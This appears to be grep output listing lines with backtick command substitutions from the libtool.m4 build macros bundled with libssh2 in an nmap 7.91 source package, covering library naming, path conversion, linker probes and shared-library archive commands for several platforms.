nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2560-      # pw32 DLLs use 'pw' prefix rather than 'lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2561:      library_names_spec='`echo $libname | sed -e 's/^lib/pw/'``echo $release | $SED -e 's/[[.]]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2562-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2569-    libname_spec='$name'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2570:    soname_spec='$libname`echo $release | $SED -e 's/[[.]]/-/g'`$versuffix$shared_ext'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2571-    library_names_spec='$libname.dll.lib'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2581-        # Let DOS variable expansion print the short 8.3 style file name.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2582:        lt_path=`cd "$lt_path" 2>/dev/null && cmd //C "for %i in (".") do @echo %~si"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2583-        sys_lib_search_path_spec="$sys_lib_search_path_spec $lt_path"
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2586-      # Convert to MSYS style.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2587:      sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | sed -e 's|\\\\|/|g' -e 's| \\([[a-zA-Z]]\\):| /\\1|g' -e 's|^ ||'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2588-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2592-      # like /cygdrive/c/PROGRA~1:/cygdr...
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2593:      sys_lib_search_path_spec=`cygpath --path --unix "$LIB"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2594:      sys_lib_search_path_spec=`cygpath --path --dos "$sys_lib_search_path_spec" 2>/dev/null`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2595:      sys_lib_search_path_spec=`cygpath --path --unix "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2596-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2600-        # It is most probably a Windows format PATH.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2601:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2602-      else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2603:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2604-      fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2610-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2611:    postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2612:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2613:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2614-      test -d \$dldir || mkdir -p \$dldir~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2615-      $install_prog $dir/$dlname \$dldir/$dlname'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2616:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2617-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2624-    # Assume MSVC wrapper
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2625:    library_names_spec='$libname`echo $release | $SED -e 's/[[.]]/-/g'`$versuffix$shared_ext $libname.lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2626-    dynamic_linker='Win32 ld.exe'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2641-  shlibpath_var=DYLD_LIBRARY_PATH
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2642:  shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2643-m4_if([$1], [],[
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2875-  if test -f /etc/ld.so.conf; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2876:    lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \[$]2)); skip = 1; } { if (!skip) print \[$]0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[	 ]*hwcap[	 ]/d;s/[:,	]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;s/"//g;/^$/d' | tr '\n' ' '`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2877-    sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra"
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2941-  need_lib_prefix=no
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2942:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2943-    need_version=no
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2968-  sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2969:  postinstall_cmds='base_file=`basename \$file`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2970:    dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; $ECHO \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2971:    dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2972-    test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2977-    fi'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:2978:  postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; $ECHO \$dlname'\''`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-2979-    dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3188-	"file_magic "*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3189:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3190-	  MAGIC_CMD=$lt_cv_path_MAGIC_CMD
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3271-    # gcc leaves a trailing carriage return, which upsets mingw
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3272:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3273-  *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3274:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3275-  esac
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3280-      # Canonicalize the pathname of ld
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3281:      ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3282-      while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3283:	ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3284-      done
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3311-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3312:      case `"$lt_cv_path_LD" -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3313-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3351-[# I'd rather use --version here, but apparently some GNU lds only accept -v.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3352:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3353-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3578-openbsd* | bitrig*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3579:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3580-    lt_cv_deplibs_check_method='match_pattern /lib[[^/]]+(\.so\.[[0-9]]+\.[[0-9]]+|\.so|_pic\.a)$'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3645-    else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3646:      file_magic_glob=`echo aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ | $SED -e "s/\(..\)/s\/[[\1]]\/[[\1]]\/g;/g"`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3647-    fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3696-	esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3697:	case `"$tmp_nm" -B $lt_bad_file 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3698-	*$lt_bad_file* | *'Invalid file or object type'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3702-	*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3703:	  case `"$tmp_nm" -p /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3704-	  */dev/null*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3728-    AC_CHECK_TOOLS(DUMPBIN, [dumpbin "link -dump"], :)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3729:    case `$DUMPBIN -symbols -headers /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3730-    *COFF*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3787-  # decide which one to use based on capabilities of $DLLTOOL
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3788:  case `$DLLTOOL --help 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3789-  *--identify-strict*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3961-# If we're using GNU nm, then use its standard symbol codes.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:3962:case `$NM -V 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-3963-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4009-mingw*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:4010:  opt_cr=`$ECHO 'x\{0,1\}' | tr x '\015'` # option cr in regexp
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4011-  ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4414-	  *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:4415:	    case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4416-	    *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4756-      *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:4757:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4758-	*Sun\ Ceres\ Fortran* | *Sun*Fortran*\ [[1-7]].* | *Sun*Fortran*\ 8.[[0-3]]*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4939-    else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:4940:      _LT_TAGVAR(export_symbols_cmds, $1)='`func_echo_all $NM | $SED -e '\''s/B\([[^B]]*\)$/P\1/'\''` -PCpgl $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) && ([substr](\$ 1,1,1) != ".")) { if ((\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) { print \$ 1 " weak" } else { print \$ 1 } } }'\'' | sort -u > $export_symbols'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-4941-    fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5038-	# shared libraries, regardless of the interface used.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5039:	case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5040-	  *\ \(GNU\ Binutils\)\ 2.19.5*) ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5070-    supports_anon_versioning=no
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5071:    case `$LD -v | $SED -e 's/([^)]\+)\s\+//' 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5072-      *GNU\ gold*) supports_anon_versioning=yes ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5173-	prefix_cmds="$SED"~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5174:	if test EXPORTS = "`$SED 1q $export_symbols`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5175-	  prefix_cmds="$prefix_cmds -e 1d";
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5195-      # time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5196:      _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5197:      _LT_TAGVAR(archive_expsym_cmds, $1)='sed "s|^|_|" $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--retain-symbols-file,$output_objdir/$soname.expsym $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5198-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5213-        pgcc*)				# Portland Group C compiler
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5214:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5215-	  tmp_addflag=' $pic_flag'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5218-					# Portland Group f77 and f90 compilers
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5219:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5220-	  tmp_addflag=' $pic_flag -Mnomain' ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5235-	nvcc*)	# Cuda Compiler Driver 2.2
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5236:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5237-	  _LT_TAGVAR(compiler_needs_object, $1)=yes
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5239-	esac
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5240:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5241-	*Sun\ C*)			# Sun C 5.9
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5242:	  _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5243-	  _LT_TAGVAR(compiler_needs_object, $1)=yes
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5310-    sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5311:      case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5312-        *\ [[01]].* | *\ 2.[[0-9]].* | *\ 2.1[[0-5]].*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5399-	else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5400:	  _LT_TAGVAR(export_symbols_cmds, $1)='`func_echo_all $NM | $SED -e '\''s/B\([[^B]]*\)$/P\1/'\''` -PCpgl $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) && ([substr](\$ 1,1,1) != ".")) { if ((\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) { print \$ 1 " weak" } else { print \$ 1 } } }'\'' | sort -u > $export_symbols'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5401-	fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5464-	# below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5465:	  collect2name=`$CC -print-prog-name=collect2`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5466-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5520-        _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='$wl-blibpath:$libdir:'"$aix_libpath"
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5521:        _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -o $output_objdir/$soname $libobjs $deplibs $wl'$no_entry_flag' $compiler_flags `if test -n "$allow_undefined_flag"; then func_echo_all "$wl$allow_undefined_flag"; else :; fi` $wl'$exp_sym_flag:\$export_symbols' '$shared_flag
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5522-      else
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5545-	  # -brtl affects multiple linker settings, -berok does not and is overridden later
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5546:	  compiler_flags_filtered='`func_echo_all "$compiler_flags " | $SED -e "s%-brtl\\([[, ]]\\)%-berok\\1%g"`'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5547-	  if test svr4 != "$with_aix_soname"; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5636-	# FIXME: Setting linknames here is a bad hack.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5637:	_LT_TAGVAR(archive_cmds, $1)='$CC -o $lib $libobjs $compiler_flags `func_echo_all "$deplibs" | $SED '\''s/ -lc$//'\''` -link -dll~linknames='
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5638-	# The linker will automatically build a .lib file if we build a DLL.
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5774-      if test yes = "$GCC"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5775:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5776-	# Try to use the -exported_symbol ld option, if it does not
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5797-	if test yes = "$lt_cv_irix_exported_symbol"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5798:          _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations $wl-exports_file $wl$export_symbols -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5799-	fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5801-      else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5802:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5803:	_LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -exports_file $export_symbols -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5804-      fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5848-	_LT_TAGVAR(hardcode_direct_absolute, $1)=yes
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5849:	if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5850-	  _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5879-	prefix_cmds="$SED"~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5880:	if test EXPORTS = "`$SED 1q $export_symbols`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5881-	  prefix_cmds="$prefix_cmds -e 1d";
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5893-	_LT_TAGVAR(allow_undefined_flag, $1)=' $wl-expect_unresolved $wl\*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5894:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5895-      else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5896-	_LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5897:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5898-      fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5906-	_LT_TAGVAR(allow_undefined_flag, $1)=' $wl-expect_unresolved $wl\*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5907:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $pic_flag $libobjs $deplibs $compiler_flags $wl-msym $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5908-	_LT_TAGVAR(hardcode_libdir_flag_spec, $1)='$wl-rpath $wl$libdir'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5910-	_LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5911:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -msym -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5912:	_LT_TAGVAR(archive_expsym_cmds, $1)='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done; printf "%s\\n" "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5913:          $CC -shared$allow_undefined_flag $wl-input $wl$lib.exp $compiler_flags $libobjs $deplibs -soname $soname `test -n "$verstring" && $ECHO "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib~$RM $lib.exp'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5914-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5929-      else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:5930:	case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-5931-	*"Compilers 5.0"*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6122-	  _LT_TAGVAR(allow_undefined_flag, $1)=
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6123:	  if AC_TRY_EVAL(_LT_TAGVAR(archive_cmds, $1) 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6124-	  then
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6426-        # ancient GNU ld didn't support --whole-archive et. al.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6427:        if eval "`$CC -print-prog-name=ld` --help 2>&1" |
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6428-	  $GREP 'no-whole-archive' > /dev/null; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6536-          # below for broken collect2 doesn't work under 4.3+
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6537:	  collect2name=`$CC -print-prog-name=collect2`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6538-	  if test -f "$collect2name" &&
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6594-
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6595:          _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -o $output_objdir/$soname $libobjs $deplibs $wl'$no_entry_flag' $compiler_flags `if test -n "$allow_undefined_flag"; then func_echo_all "$wl$allow_undefined_flag"; else :; fi` $wl'$exp_sym_flag:\$export_symbols' '$shared_flag
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6596-        else
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6619-	    # -brtl affects multiple linker settings, -berok does not and is overridden later
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6620:	    compiler_flags_filtered='`func_echo_all "$compiler_flags " | $SED -e "s%-brtl\\([[, ]]\\)%-berok\\1%g"`'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6621-	    if test svr4 != "$with_aix_soname"; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6748-	  prefix_cmds="$SED"~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6749:	  if test EXPORTS = "`$SED 1q $export_symbols`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6750-	    prefix_cmds="$prefix_cmds -e 1d";
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6822-            # dependencies.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6823:            output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $EGREP " \-L"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6824-            ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6887-	    # dependencies.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6888:	    output_verbose_link_cmd='templist=`($CC -b $CFLAGS -v conftest.$objext 2>&1) | $GREP " \-L"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6889-	    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6923-	# time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6924:	_LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
